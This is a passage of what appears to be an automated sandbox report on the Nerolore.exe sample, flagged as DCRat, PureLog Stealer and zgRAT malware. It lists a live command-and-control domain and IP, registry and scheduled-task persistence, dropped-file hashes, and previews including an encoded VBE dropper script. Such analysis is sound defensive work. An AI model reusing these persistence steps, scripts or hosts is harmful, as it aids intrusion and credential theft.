                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              https://duckduckgo.com/ac/?q=NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3371511571.000000001295D000.00000004.00000800.00020000.00000000.sdmp, g1xwJn77k7.29.dr, 1JeEX4hzC8.29.drfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoNjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3371511571.000000001295D000.00000004.00000800.00020000.00000000.sdmp, g1xwJn77k7.29.dr, 1JeEX4hzC8.29.drfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://373292cm.nyashka.topNjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3350660394.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp, NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3350660394.00000000028C4000.00000004.00000800.00020000.00000000.sdmptrue
                              • 19%, Virustotal, Browse
                              • Avira URL Cloud: malware
                              		unknown
                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchNjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3371511571.000000001295D000.00000004.00000800.00020000.00000000.sdmp, g1xwJn77k7.29.dr, 1JeEX4hzC8.29.drfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.enigmaprotector.com/openUNerolore.exe, 00000000.00000002.2093218096.0000000000FF2000.00000040.00000001.01000000.00000003.sdmpfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3371511571.000000001295D000.00000004.00000800.00020000.00000000.sdmp, g1xwJn77k7.29.dr, 1JeEX4hzC8.29.drfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://373292cm.nyashka.top/NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3350660394.00000000027D1000.00000004.00000800.00020000.00000000.sdmptrue
                              • 19%, Virustotal, Browse
                              • Avira URL Cloud: malware
                              		unknown
                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3371511571.000000001295D000.00000004.00000800.00020000.00000000.sdmp, g1xwJn77k7.29.dr, 1JeEX4hzC8.29.drfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.enigmaprotector.com/Nerolore.exe, 00000000.00000002.2093218096.0000000000FF2000.00000040.00000001.01000000.00000003.sdmpfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.ecosia.org/newtab/NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3371511571.000000001295D000.00000004.00000800.00020000.00000000.sdmp, g1xwJn77k7.29.dr, 1JeEX4hzC8.29.drfalse
                              • URL Reputation: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameContainerAgentWinSession.exe, 00000005.00000002.2279169937.0000000003642000.00000004.00000800.00020000.00000000.sdmp, NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3350660394.00000000027D1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3371511571.000000001295D000.00000004.00000800.00020000.00000000.sdmp, g1xwJn77k7.29.dr, 1JeEX4hzC8.29.drfalse
                              • URL Reputation: safe
                              		unknown
                              http://373292cm.nyPr8NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3350660394.0000000002AF7000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              80.211.144.156
                              		373292cm.nyashka.topItaly
                              		31034ARUBA-ASNITtrue

                              General Information

                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1498674
                              Start date and time:2024-08-25 15:42:05 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 9m 14s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:46
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:Nerolore.exe
                              Detection:MAL
                              Classification:mal100.spre.troj.spyw.expl.evad.winEXE@52/56@3/1
                              EGA Information:
                              • Successful, ratio: 20%
                              HCA Information:Failed
                              Cookbook Comments:
                              • Found application associated with file extension: .exe

                              Warnings

                              • Exclude process from analysis (whitelisted): dllhost.exe, OfficeClickToRun.exe, SIHClient.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target ContainerAgentWinSession.exe, PID 7200 because it is empty
                              • Execution Graph export aborted for target ContainerAgentWinSession.exe, PID 7208 because it is empty
                              • Execution Graph export aborted for target NjWYKcLujkVoPzemFBeg.exe, PID 5664 because it is empty
                              • Execution Graph export aborted for target NjWYKcLujkVoPzemFBeg.exe, PID 6968 because it is empty
                              • Execution Graph export aborted for target NjWYKcLujkVoPzemFBeg.exe, PID 7380 because it is empty
                              • Execution Graph export aborted for target conhost.exe, PID 5424 because it is empty
                              • Execution Graph export aborted for target conhost.exe, PID 5632 because it is empty
                              • Execution Graph export aborted for target conhost.exe, PID 7260 because it is empty
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                              • Report size getting too big, too many NtOpenFile calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              09:43:28API Interceptor214830x Sleep call for process: NjWYKcLujkVoPzemFBeg.exe modified
                              15:43:18Task SchedulerRun new task: conhost path: "C:\Users\All Users\dbg\conhost.exe"
                              15:43:18Task SchedulerRun new task: conhostc path: "C:\Users\All Users\dbg\conhost.exe"
                              15:43:18Task SchedulerRun new task: NjWYKcLujkVoPzemFBeg path: "C:\FontHost\NjWYKcLujkVoPzemFBeg.exe"
                              15:43:18Task SchedulerRun new task: NjWYKcLujkVoPzemFBegN path: "C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe"
                              15:43:18Task SchedulerRun new task: OfficeClickToRun path: "C:\Users\Default\Templates\OfficeClickToRun.exe"
                              15:43:18Task SchedulerRun new task: OfficeClickToRunO path: "C:\Users\Default\Templates\OfficeClickToRun.exe"
                              15:43:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run NjWYKcLujkVoPzemFBeg "C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe"
                              15:43:21Task SchedulerRun new task: ContainerAgentWinSession path: "C:\FontHost\ContainerAgentWinSession.exe"
                              15:43:21Task SchedulerRun new task: ContainerAgentWinSessionC path: "C:\FontHost\ContainerAgentWinSession.exe"
                              15:43:27AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Users\All Users\dbg\conhost.exe"
                              15:43:35AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun "C:\Users\Default\Templates\OfficeClickToRun.exe"
                              15:43:43AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ContainerAgentWinSession "C:\FontHost\ContainerAgentWinSession.exe"
                              15:43:51AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run NjWYKcLujkVoPzemFBeg "C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe"
                              15:44:00AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Users\All Users\dbg\conhost.exe"
                              15:44:08AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun "C:\Users\Default\Templates\OfficeClickToRun.exe"
                              15:44:16AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ContainerAgentWinSession "C:\FontHost\ContainerAgentWinSession.exe"
                              15:44:25AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run NjWYKcLujkVoPzemFBeg "C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe"
                              15:44:33AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Users\All Users\dbg\conhost.exe"
                              15:44:41AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun "C:\Users\Default\Templates\OfficeClickToRun.exe"
                              15:44:49AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run ContainerAgentWinSession "C:\FontHost\ContainerAgentWinSession.exe"
                              15:45:05AutostartRun: WinLogon Shell "C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe"
                              15:45:13AutostartRun: WinLogon Shell "C:\FontHost\NjWYKcLujkVoPzemFBeg.exe"

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              80.211.144.156SpotifyStartupTask.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 973800cm.nyashsens.top/SecureBigloadServerDefaulttestdlepublic.php
                              SpotifyStartupTask2.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 572335cm.n9sh.top/CpuserverAsyncuniversal.php
                              BxV2vsnP6f.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • fizika.top/vmphp_geoUpdateProtectBasecdn.php
                              loader.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 782652cm.n9sh.top/providerImageProcessorGeneratorwp.php
                              MIDNIGHT.exeGet hashmaliciousDCRat, PureLog Stealer, XWorm, zgRATBrowse
                              • 782652cm.n9sh.top/providerImageProcessorGeneratorwp.php
                              b5d8kjYEBH.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 951499cm.nyashtech.top/sqlcentralUploads.php
                              cBEWDhqv1r.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 389075cm.n9sh.top/tolowProcessserverwindowsFlowertesttrackWpUploads.php
                              A6CuqcjdpG.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 951499cm.nyashtech.top/sqlcentralUploads.php
                              79khRJMBK9.exeGet hashmaliciousDCRatBrowse
                              • volki.top/CpuLongpolltrackDatalifeCdnuploads.php
                              EQ1VCbEIkT.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 951499cm.nyashtech.top/sqlcentralUploads.php

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              373292cm.nyashka.topjW5TA1J9Z1.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 80.211.144.156

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              ARUBA-ASNITSpotifyStartupTask.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 80.211.144.156
                              SpotifyStartupTask2.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 80.211.144.156
                              BxV2vsnP6f.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 80.211.144.156
                              loader.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 80.211.144.156
                              MIDNIGHT.exeGet hashmaliciousDCRat, PureLog Stealer, XWorm, zgRATBrowse
                              • 80.211.144.156
                              b5d8kjYEBH.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 80.211.144.156
                              cBEWDhqv1r.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 80.211.144.156
                              A6CuqcjdpG.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 80.211.144.156
                              79khRJMBK9.exeGet hashmaliciousDCRatBrowse
                              • 80.211.144.156
                              EQ1VCbEIkT.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 80.211.144.156

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\FontHost\54f8e4f5b93f5a

                              Download File
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:ASCII text, with very long lines (682), with no line terminators
                              Category:dropped
                              Size (bytes):682
                              Entropy (8bit):5.884418242643272
                              Encrypted:false
                              SSDEEP:12:P8CWavAilZBJ9McPtx+frppwK3DoMThR1OgNaox6WBVn+ziyVsqAM:P8C9jBJ9MwCx3DoMThR1OgrkAZyVaM
                              MD5:F89357C623B432B41B879DB7EDC6CE66
                              SHA1:983F2C8BF1EB0B8A3C459F518EC03BC3B6DE820B
                              SHA-256:A13FD56225F8982E943378D3810FCE8C4150432966635A016430F0D00740C06B
                              SHA-512:BD7D38ECCC025598F9C8227912D483BD011F711360FD52C7BCF10FE8AAEA81B7F3F0A863DFEF7240D65FFD9355C37BC10AC86D72F2904E3DC831A40CFBBF2545
                              Malicious:false
                              Preview:8GIJuOhYhsslTTl7hrJXsBbgMfiYQz9DJVFqgJ5EAJFjjmmQ9IBXSd77pl6OpIHrspc8N5bYvFXj617j3RYHymupXIA4MrY1BY04KoCErmmNGYAyoWVXt92G4xkF5hMEqfhhACZOOUaMAhi8HMPzVBHBgt9XD7JJahgl1dxl7GIZjqGWOm8tRWspXfBQCCLRKRvcA7HoYn1O2scznnIb8a1Ey1NVbhj550OR5oWQfUUoeewpCLnZ3uTuZrnItvM0E6TCdK48R26oFNjUFiSP4JCLhe2NANhtHejiKuL1QoIAyopMITDKc6653Ie9Sr7DUMglnAJVWa9PABX3zpFrJWRLhooCPMjjrEplHEjHJryB7r42vlKmlP385VD8VHGK1Zi6VvvuG7ichPN0uwRoC68bKrqvAkwCloJiJ8g90ZgnrbapINOizcH5bHvoF9ugLg03FprwQRynZUttQAnxWNMJgOGCN240oAcLlhkcgbSioefGXBYEV6J7TqX1ipjYW78Z2iItZLR44nfCsAoLdzes0e14Kt3124MqfFOz3ppKpPCqLUIiAY4gcQjXqOjqRZBAbygmvzRyKUCkbLszkV0eApOPg0IpG83PNCOWyfwLGFWHO85fftF5jhAwkQG5rmsMbwXZ6WBFjpY4TGBh4mJW27qqCcvhY1deXJqblg

                              C:\FontHost\5d6858f13b2737

                              Download File
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:ASCII text, with very long lines (332), with no line terminators
                              Category:dropped
                              Size (bytes):332
                              Entropy (8bit):5.8335759852953055
                              Encrypted:false
                              SSDEEP:6:ONpApthSfF9yTn4StUV3QXw1APIwRacELTzrx08ZIftzpE8dicISqU8fvI:wpAJoF9yEStUV3ofxRaljZyVdicbv9
                              MD5:6380CB1F24A7D1FD02B9F6987C3EB779
                              SHA1:4A653C30F23D5087CD481F85358DC7D29149C31A
                              SHA-256:FA1DE9ABD89D952CC8CC84074CF593AA1FF340A852BE8C3314D2B495D9257095
                              SHA-512:2ABAB82B49BA10FEA484D54BF374E680C33CB49A5AEB8351AC84DB80605FA13CEEFFDA27D2F5AFD331A94BDD7BAF74B736E1D7FF6BD1030E8CAF33DA39921C06
                              Malicious:false
                              Preview:QqGxVf4GiMycKu1P2Ut6QrWWpWN770pu3znAABNdhKLsdqJgt6nxhMDiUuI8R7IsgDjVH0P1HQZGgo28NrNAN1MrvEqQ2OLjCcLZHxZ2rvqRw7Cp1JuktHeo01jCK982EzDDcc0ZRUTbL55yCAYsdl048gjQNXssxyN638NYTVTYyDd56vAJkPYd9JF53kL4mkoWs85Dx9ZISbF4DnUcXiIhZu7t3ResJYwOZGN706Wl0PLiDK2QQthDcG77BLKger93o1f6aWmaMgrJiYqsYOcZ1svSJP6owzGJPS3Mo603GG15YxZmfbHPOkB6FNwKZ7oWai3QedDc

                              C:\FontHost\ContainerAgentWinSession.exe

                              Download File
                              Process:C:\Users\user\Desktop\Nerolore.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):1957888
                              Entropy (8bit):7.548545725494237
                              Encrypted:false
                              SSDEEP:24576:UaseMBOPMCPt3ZBngCi5OgpgPz3oOOMeqf3ocj7U45KQkBHiCXuKt7xiGRV:qNod2OgiPz3qMebcU4Et7MG
                              MD5:03EF05FF3B0C058220324C2CE72950F2
                              SHA1:1D82C1A36AD54002E93AB1665308343E8FBB3041
                              SHA-256:9D4430A9841B632DDFE2E41E4BA828A860194BC7A2B2F494655C2DB9841056C1
                              SHA-512:23C96AE50B2DA42FAB79D8BD0ABABC820E84A4A5C46473E916425C39AC4BB24FAEAF49FFC6D37B26D4E8B5E9BAB15D9951E6B1DCE12CBDF1C904930CA1B69772
                              Malicious:true
                              Yara Hits:
                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\FontHost\ContainerAgentWinSession.exe, Author: Joe Security
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\FontHost\ContainerAgentWinSession.exe, Author: Joe Security
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\FontHost\ContainerAgentWinSession.exe, Author: Joe Security
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\FontHost\ContainerAgentWinSession.exe, Author: Joe Security
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 66%
                              • Antivirus: Virustotal, Detection: 55%, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...tl.f................................. ........@.. .......................@............@.................................@...K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B................p.......H...........|............................................................0..........(.... ........8........E....\.......)...M...8W...(.... ....~....{~...9....& ....8....(.... ....~....{....:....& ....8....(.... ....8....*....0.......... ........8........E............S...............8....~....:{... ....~....{n...9....& ....8.......... ....~....{....:....& ....8........~....(D...~....(H... ....<.... ....8d...r...ps....z*8.... ....~....{h...:?...& ....84...~....(<... .... .... .

                              C:\FontHost\NjWYKcLujkVoPzemFBeg.exe

                              Download File
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):1957888
                              Entropy (8bit):7.548545725494237
                              Encrypted:false
                              SSDEEP:24576:UaseMBOPMCPt3ZBngCi5OgpgPz3oOOMeqf3ocj7U45KQkBHiCXuKt7xiGRV:qNod2OgiPz3qMebcU4Et7MG
                              MD5:03EF05FF3B0C058220324C2CE72950F2
                              SHA1:1D82C1A36AD54002E93AB1665308343E8FBB3041
                              SHA-256:9D4430A9841B632DDFE2E41E4BA828A860194BC7A2B2F494655C2DB9841056C1
                              SHA-512:23C96AE50B2DA42FAB79D8BD0ABABC820E84A4A5C46473E916425C39AC4BB24FAEAF49FFC6D37B26D4E8B5E9BAB15D9951E6B1DCE12CBDF1C904930CA1B69772
                              Malicious:true
                              Yara Hits:
                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe, Author: Joe Security
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe, Author: Joe Security
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe, Author: Joe Security
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe, Author: Joe Security
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 66%
                              • Antivirus: Virustotal, Detection: 55%, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...tl.f................................. ........@.. .......................@............@.................................@...K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B................p.......H...........|............................................................0..........(.... ........8........E....\.......)...M...8W...(.... ....~....{~...9....& ....8....(.... ....~....{....:....& ....8....(.... ....8....*....0.......... ........8........E............S...............8....~....:{... ....~....{n...9....& ....8.......... ....~....{....:....& ....8........~....(D...~....(H... ....<.... ....8d...r...ps....z*8.... ....~....{h...:?...& ....84...~....(<... .... .... .

                              C:\FontHost\g5hurAAWnnmPcvivkFQfeK8OCkdYaf1Ra.vbe

                              Download File
                              Process:C:\Users\user\Desktop\Nerolore.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):224
                              Entropy (8bit):5.867997713932616
                              Encrypted:false
                              SSDEEP:6:GPwqK+NkLzWbHw/JUrFnBaORbM5nC+ZpQPOqvRBPkYYY:GWMCzWLVhBaORbQC+WdpB5YY
                              MD5:47BFCD5994928ECCF94E80946AF68B10
                              SHA1:00A6C369333643B1084C1D6FE7A7A5239E7C8B8C
                              SHA-256:E1A8B0DDDE7C4DEBCAF4F943488399E2AC509C5FB863F96C9CFFE06A99A0EE2C
                              SHA-512:C99326CEEC83FD46CEB46E810618E5F5DAB197B069A53654C17377DAF8F67E1FDD3EA4ECDB5B9743CB6391691A6184B7EB7B6C02C29E400A1166284AB0FDDC77
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              Preview:#@~^xwAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFf!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=zoKxDCWkYJ&LmA.2Go*slSj2.NSW!Io*Nos_?LVU^81\H:;bc4COr~PTS,0CVknaj4AAA==^#~@.

                              C:\FontHost\jaBrEDg4l5LU3rdwo0YF4dXFHSglnc1NMMTuA.bat

                              Download File
                              Process:C:\Users\user\Desktop\Nerolore.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):89
                              Entropy (8bit):5.04427174089609
                              Encrypted:false
                              SSDEEP:3:s1+RXQClxhAKqHKlRAXLuRytQ0dAHAvKiIyx:skXQCrMHKl1RyG0pvKhyx
                              MD5:78D0BAFBE771F59292A1DCD87F530745
                              SHA1:936326E650C1437B9D0E7E8EB846AEFA80211546
                              SHA-256:2924E7292BDC8B22CA3F24180817C2B0314D4B9F6A7A7900B42A74B8185A0899
                              SHA-512:B1B189CBE2AEB063F2FAA3E6508859792F4ECCD64E4887A0728AAC1C6B31B56DF7C24A53E1354B4F5B3625D1A39796AC940D7556EDAD1240826A503EF9C3C0C1
                              Malicious:false
                              Preview:%lPjNghBINidpd%%nTthv%..%BfgukdTxZQC%"C:\FontHost/ContainerAgentWinSession.exe"%JoGqtgTy%

                              C:\Program Files (x86)\Microsoft\Edge\Application\CSC8B039BDD94094F1C8481C1D931E1DDC9.TMP

                              Download File
                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              File Type:MSVC .res
                              Category:dropped
                              Size (bytes):1168
                              Entropy (8bit):4.448520842480604
                              Encrypted:false
                              SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                              MD5:B5189FB271BE514BEC128E0D0809C04E
                              SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                              SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                              SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                              Malicious:false
                              Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro

                              C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                              Download File
                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):4608
                              Entropy (8bit):3.926258037088774
                              Encrypted:false
                              SSDEEP:48:6omNtWxZ8RxeOAkFJOcV4MKe28dod4u80vqBHnuulB+hnqXSfbNtm:OpxvxVx9L0vkZTkZzNt
                              MD5:628CB6CEBB6DE194ABCAE0F7E7C53FCB
                              SHA1:35BB9497C573CF3E90CBF05F67C34209EBE740AD
                              SHA-256:04F8A2CB2C4363F9F62A6DBB082CD57111302A1BFFB8FDBDEE3254C6F1AB42F1
                              SHA-512:3BD8C876F2A8EEB11B18FA863D7A7C0E7C54EB2B40E3E95AD2A6694C886D2A00A62BE595C1CCDE9915F90FCDC468888525FC3465B218512B71890AA642A6E465
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...VC.f.............................'... ...@....@.. ....................................@.................................d'..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..<.............................................................(....*.0..!.......r...pr...p.{....(....(....&..&..*....................0..........r...p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID....... ...#Blob...........WU........%3................................................................

                              C:\Program Files\7-Zip\Lang\54f8e4f5b93f5a

                              Download File
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:ASCII text, with very long lines (364), with no line terminators
                              Category:dropped
                              Size (bytes):364
                              Entropy (8bit):5.797295390114544
                              Encrypted:false
                              SSDEEP:6:AAra9uyRvq+XEWhLiRnTVxR/ImMaVlaRs0qhEWnF+m9//kbPTaNBextKw8WHWxcY:AAgy+NRinX/I5esRs0AEVy/ygBYIraQH
                              MD5:278BD2271A21B01BEE6E0DDFF3518B17
                              SHA1:8188A2D3D4C78B86F1FE906E50A4D51DA8402B33
                              SHA-256:336C7CF8EF6A006D8D9AC9863ECF66196245614A22B246F5CD97AA56B5726C99
                              SHA-512:C8D8B49D627D625D1ABD6D5AA5CB58FFF25FAC68D154D351A56D52275EF7AF7E69AC29E7E3BE83B38D72E1E8F6C4981EFC2B818297259C0A235832E8D43CC63B
                              Malicious:false
                              Preview:TeFqWekeqsL4hJaj5YDAo1lxh69RRz1YBAzLW4KEiNUnrPiTDpnmBcrb2SJafTM01w2gTONBO8bah7FSYpNmMPXiSYTEvtjPBdw5WBAzcmXDBR44N1BzGkomZUN55IQeYMYELK5WpXJk1ThBdY03suJbzKfByE4TW3py20tD5oKsaEvFwMbhRWvoC7OAo3ikdzN7osInox7DjaAvZZPmmXB9IAv4lsYBFjOl0xbDDx2dZrEm7dlOo67GxOzo6NC5Z579MY5l8Liyehka5J7HHJXJlIxl8wGzv7EdtEZiiAQcXImPoYswQ4yQiyXDkTmLEtDhdHq1tYjG34vdfi7kEUi0Ix45qV8PXEYoFFvhs1D2

                              C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe

                              Download File
